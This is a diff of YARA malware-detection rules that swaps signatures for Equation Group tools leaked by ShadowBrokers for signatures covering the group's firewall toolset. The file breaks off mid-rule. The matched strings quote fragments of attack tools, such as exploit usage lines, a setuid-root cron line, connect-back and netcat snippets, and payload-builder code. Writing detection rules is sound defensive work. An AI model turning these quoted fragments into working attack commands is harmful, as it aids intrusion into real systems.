+rule SIGNATURE_BASE_EQGRP_Tunnel_State_Reader
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8"
+		description = "EQGRP Toolset Firewall - file tunnel_state_reader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "30e94123-acc9-5185-9f5b-1f956c4cf3d1"
-		date = "2017-04-08"
+		id = "e48c9482-eae5-5c34-b7b2-502d0252f4a0"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L328-L343"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L299-L313"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7bd88d15cca38e91c65e8373194e35ab9492a80eb27b22ad4000e192f2d9b886"
+		logic_hash = "d0653650aad10e7ff69b7ef1e61fac64310c63cc68c6d924655f082925e4fd04"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796"
+		hash1 = "49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c"
 
 	strings:
-		$s1 = "Usage: ./exp command display_to_return_to" fullword ascii
-		$s2 = "sizeof shellcode = %d" fullword ascii
-		$s3 = "Execve failed!" fullword ascii
+		$s1 = "Active connections will be maintained for this tunnel. Timeout:" fullword ascii
+		$s5 = "%s: compatible with BLATSTING version 1.2" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Wrap_Telnet : FILE
+rule SIGNATURE_BASE_EQGRP_Payload
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh"
+		description = "EQGRP Toolset Firewall - file payload.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "158e6ebc-6b43-5e94-9052-31408d848875"
-		date = "2017-04-08"
+		id = "949cb68b-e384-578c-a906-a4d9234dc668"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L345-L360"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L315-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa7fda8b95b697bb0541642677579f9db9df379048421481cdb66068032bf681"
+		logic_hash = "22e2a4809f6646437ab0824238fec791f3760ac305f9c818089797b011425b3d"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4"
+		hash1 = "21bed6d699b1fbde74cbcec93575c9694d5bea832cd191f59eb3e4140e5c5e07"
 
 	strings:
-		$s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii
-		$s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
-		$s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii
+		$s1 = "can't find target version module!" fullword ascii
+		$s2 = "class Payload:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 4KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Elgingamble
+rule SIGNATURE_BASE_EQGRP_Eligiblecandidate
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble"
+		description = "EQGRP Toolset Firewall - file eligiblecandidate.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc8a63a1-9deb-5051-a02d-ed26fd1cae95"
-		date = "2017-04-08"
+		id = "e084b051-4aa1-54b2-9f56-69db386b46d6"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L362-L378"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L331-L348"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e561794d969b6198f71115087db8cc89043f2079252eef22458450e16596b0eb"
+		logic_hash = "e7e1b206f9c51ffe0ab016a93d551a9ede8f87adfc38fe70278be8c2f0fe0696"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd"
+		hash1 = "c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86"
 
 	strings:
-		$x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii
-		$x2 = "[-] kernel not vulnerable" fullword ascii
-		$x3 = "[-] failed to spawn shell: %s" fullword ascii
-		$x4 = "-s shell           Use shell instead of %s" fullword ascii
+		$o1 = "Connection timed out. Only a problem if the callback was not received." fullword ascii
+		$o2 = "Could not reliably detect cookie. Using 'session_id'..." fullword ascii
+		$c1 = "def build_exploit_payload(self,cmd=\"/tmp/httpd\"):" fullword ascii
+		$c2 = "self.build_exploit_payload(cmd)" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cmsd : FILE
+rule SIGNATURE_BASE_EQGRP_BUSURPER_2211_724
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd"
+		description = "EQGRP Toolset Firewall - file BUSURPER-2211-724.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9cdd3562-fed4-5b79-b056-049279404eeb"
-		date = "2017-04-08"
+		id = "d109210e-14df-5b90-a496-fa8a2454126b"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L380-L397"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L350-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2b9c7ef750c2e45df7839395db51c93204bc9855f5de05bd59c50bb6a964bc8b"
+		logic_hash = "834180ef512882cc3b22e79a6bda349678eb5042a3356a50c47eeb36ae453427"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8"
+		hash1 = "d809d6ff23a9eee53d2132d2c13a9ac5d0cb3037c60e229373fc59a4f14bc744"
 
 	strings:
-		$x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii
-		$x2 = "error: not vulnerable" fullword ascii
-		$s1 = "port=%d connected! " fullword ascii
-		$s2 = "xxx.XXXXXX" fullword ascii
+		$s1 = ".got_loader" fullword ascii
+		$s2 = "_start_text" ascii
+		$s3 = "IMPLANT" fullword ascii
+		$s4 = "KEEPGOING" fullword ascii
+		$s5 = "upgrade_implant" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of ( $x* ) ) or ( 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ebbshave : FILE
+rule SIGNATURE_BASE_EQGRP_Networkprofiler_Orderscans
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5"
+		description = "EQGRP Toolset Firewall - file networkProfiler_orderScans.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d4c14e2-afb1-57ce-91df-cb024258250e"
-		date = "2017-04-08"
+		id = "2d48df0c-f950-5bb6-8d3e-77c2f970eb57"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L399-L415"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L369-L383"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8a1a5ddefc646dc55161eb9b2a1b0e4176df7e99660db48b245af3ef9ab0871c"
+		logic_hash = "0cdf4f3d8f668ce5d5aab652c83cb4d2a9acc3471ff720448d021707b34402ef"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b"
+		hash1 = "ea986ddee09352f342ac160e805312e3a901e58d2beddf79cd421443ba8c9898"
 
 	strings:
-		$s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii
-		$s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii
-		$s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii
-		$s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii
+		$x1 = "Unable to save off predefinedScans directory" fullword ascii
+		$x2 = "Re-orders the networkProfiler scans so they show up in order in the LP" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Eggbasket : FILE
+rule SIGNATURE_BASE_EQGRP_Epicbanana_2_1_0_1
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
+		description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3fb1388a-e6b8-5c7a-ad23-ddbfc9d33d56"
-		date = "2017-04-08"
+		id = "cc3346bd-0347-5cf3-b946-5c017d68d93e"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L417-L432"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L385-L399"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4800d5c820a18d3483dc5c055c0e2f5374ce3b160ecb4d940a00ec4a90ca50d"
+		logic_hash = "be0b180e0dfdda35725ac6d9c35752a0b56bdbdaf985b6932c7d2ff342d4cde3"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
+		hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61"
 
 	strings:
-		$x1 = "# Building Shellcode into exploit." fullword ascii
-		$x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80" fullword ascii
-		$x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
+		$s1 = "failed to create version-specific payload" fullword ascii
+		$s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Jparsescan : FILE
+rule SIGNATURE_BASE_EQGRP_Sniffer_Xml2Pcap
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
+		description = "EQGRP Toolset Firewall - file sniffer_xml2pcap"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6b6a884e-0bbc-54f5-bb6c-00e15ca95250"
-		date = "2017-04-08"
+		id = "c284ac58-923c-5c34-b420-e87797915233"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L434-L448"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L401-L415"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d86b6757abb5ad1902e91f100e6a6bea52e6e14684d184b6b8138270484275f4"
+		logic_hash = "3c3aa9f42edbca32725f8c02023e3b9644162a001ded099513d12f94d70dd4c8"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
+		hash1 = "f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42"
 
 	strings:
-		$s1 = "Usage:  $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
-		$s2 = "$gotsunos = ($line =~ /program version netid     address             service         owner/ );" fullword ascii
+		$x1 = "-s/--srcip <sourceIP>  Use given source IP (if sniffer doesn't collect source IP)" fullword ascii
+		$x2 = "convert an XML file generated by the BLATSTING sniffer module into a pcap capture file." fullword ascii
 
 	condition:
-		( filesize < 40KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Sambal : FILE
+rule SIGNATURE_BASE_EQGRP_Bananaaid
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
+		description = "EQGRP Toolset Firewall - file BananaAid"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b02b442c-3e24-55f8-aa5c-926c3a3a75b4"
-		date = "2017-04-08"
+		id = "bdd3ce51-1809-5b2f-9c7e-6c0b056d022b"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L450-L467"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L417-L433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6066332b16996a9d8635d3752f46c6529cfc2c94d3d6f0c9791f2068c982bf3e"
+		logic_hash = "2ae52529547866dcfe66fffb3f5b37eba89844b7675129c66636ebef01b0f49a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
+		hash1 = "7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f"
 
 	strings:
-		$s1 = "+ Bruteforce mode." fullword ascii
-		$s3 = "+ Host is not running samba!" fullword ascii
-		$s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii
-		$s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii
-		$s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii
+		$x1 = "(might have to delete key in ~/.ssh/known_hosts on linux box)" fullword ascii
+		$x2 = "scp BGLEE-" ascii
+		$x3 = "should be 4bfe94b1 for clean bootloader version 3.0; " fullword ascii
+		$x4 = "scp <configured implant> <username>@<IPaddr>:onfig" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Pclean_V2_1_1_2 : FILE
+rule SIGNATURE_BASE_EQGRP_Bo : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
+		description = "EQGRP Toolset Firewall - file bo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b31af01-8c30-513a-a615-82dcb940e06d"
-		date = "2017-04-08"
+		id = "6aa71528-3ce6-5597-bb1a-e44cff3856d6"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L469-L483"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L435-L452"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9323ef0c76348d242b010cf0f1c6a1bf5dd120a02418350bb0ed137f468ac624"
+		logic_hash = "48c2d3f13283d2a1b7e1010c724f1e68e6002dd9a9779025dfc3a4952bec95bc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
+		hash1 = "aa8b363073e8ae754b1836c30f440d7619890ded92fb5b97c73294b15d22441d"
 
 	strings:
-		$s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii
-		$s6 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
+		$s1 = "ERROR: failed to open %s: %d" fullword ascii
+		$s2 = "__libc_start_main@@GLIBC_2.0" ascii
+		$s3 = "serial number: %s" fullword ascii
+		$s4 = "strerror@@GLIBC_2.0" fullword ascii
+		$s5 = "ERROR: mmap failed: %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 20KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Envisioncollision : FILE
+rule SIGNATURE_BASE_EQGRP_Seconddate_2211 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
+		description = "EQGRP Toolset Firewall - file SecondDate-2211.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d512d9a-45a5-514a-bee1-a364beeaf560"
-		date = "2017-04-08"
+		id = "00951270-6189-58b6-8b64-422c4ab15ebe"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L485-L501"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L454-L470"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8cd8c24b212ca71feb6093682fc614c88790c10d7c7d72dac65b047e5791894a"
+		logic_hash = "f51f4cfb3b1c77f03a3627cccfee72e57731b26b01907cc837f246a8f7677580"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
+		hash1 = "2337d0c81474d03a02c404cada699cf1b86c3c248ea808d4045b86305daa2607"
 
 	strings:
-		$x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii
-		$x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii
-		$s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii
-		$s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" fullword ascii
+		$s1 = "SD_processControlPacket" fullword ascii
+		$s2 = "Encryption_rc4SetKey" fullword ascii
+		$s3 = ".got_loader" fullword ascii
+		$s4 = "^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\n" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) ) or ( 2 of them )
+		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Cmsex : FILE
+rule SIGNATURE_BASE_EQGRP_Config_Jp1_UA
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
+		description = "EQGRP Toolset Firewall - file config_jp1_UA.pl"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a1051a5-3f31-5fc2-85a0-beb2dea962d6"
-		date = "2017-04-08"
+		id = "947e6f90-4eb4-5241-9819-677cee0c15d8"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L503-L520"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L472-L488"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "997e08a49c5ae82bcc590e5febd449a4d3e9098f5aa154ccc0824b976f0a6365"
+		logic_hash = "8dd504bd00f72b1500375fbe451f5abb055cb2ff440f6ae4314b1e3d64097b83"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
+		hash1 = "2f50b6e9891e4d7fd24cc467e7f5cfe348f56f6248929fec4bbee42a5001ae56"
 
 	strings:
-		$x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii
-		$x2 = "-i target ip address / hostname " fullword ascii
-		$x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii
-		$x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii
-		$x5 = "If one choice fails, you may want to try another." fullword ascii
+		$x1 = "This program will configure a JETPLOW Userarea file." fullword ascii
+		$x2 = "Error running config_implant." fullword ascii
+		$x3 = "NOTE:  IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION " fullword ascii
+		$x4 = "First IP address for beacon destination [127.0.0.1]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of ( $x* ) ) or ( 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Exze : FILE
+rule SIGNATURE_BASE_EQGRP_Userscript
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
+		description = "EQGRP Toolset Firewall - file userscript.FW"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d452b952-0c4a-501b-93f5-064d13f2c08e"
-		date = "2017-04-08"
+		id = "c6c1b70e-437f-50e7-9055-b943a1a62e6c"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L522-L537"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L490-L503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b8678f58da689be9507a345b6b80ece6cdb7a78d73db339bdc15ad0a66b4a2e6"
+		logic_hash = "718ee434c8ae61e2709df6dd431dbb0a2230085f0132ae82c7ceda4de75248cf"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
+		hash1 = "5098ff110d1af56115e2c32f332ff6e3973fb7ceccbd317637c9a72a3baa43d7"
 
 	strings:
-		$s1 = "shellFile" fullword ascii
-		$s2 = "completed.1" fullword ascii
-		$s3 = "zeke_remove" fullword ascii
+		$x1 = "Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 80KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_DUL : FILE
+rule SIGNATURE_BASE_EQGRP_BBALL_M50FW08_2201 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
+		description = "EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6dd90b30-30cb-531c-b8e2-fc208b21e8e6"
-		date = "2017-04-08"
+		id = "bced11a2-fac4-58e5-a4a8-1c6d5fe418f9"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L539-L553"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L505-L523"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "55df9a844352babf0c30075139e2a62cbf9db898280546d27b172e4d611ce1c0"
+		logic_hash = "dd180203ec4c4ddfa2c46cba672eb94179553637a9f7548b25dee7b88c3d3294"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
+		hash1 = "80c0b68adb12bf3c15eff9db70a57ab999aad015da99c4417fdfd28156d8d3f7"
 
 	strings:
-		$x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii
-		$x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii
+		$s1 = ".got_loader" fullword ascii
+		$s2 = "LOADED" fullword ascii
+		$s3 = "pageTable.c" fullword ascii
+		$s4 = "_start_text" ascii
+		$s5 = "handler_readBIOS" fullword ascii
+		$s6 = "KEEPGOING" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them )
+		( uint16( 0 ) == 0x457f and filesize < 40KB and 5 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Slugger2 : FILE
+rule SIGNATURE_BASE_EQGRP_BUSURPER_3001_724 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2"
+		description = "EQGRP Toolset Firewall - file BUSURPER-3001-724.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3787a39e-0123-5b46-90c9-6b772b1fd96c"
-		date = "2017-04-08"
+		id = "006877e9-1e73-5a27-8b3a-bca3513a2035"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L555-L574"
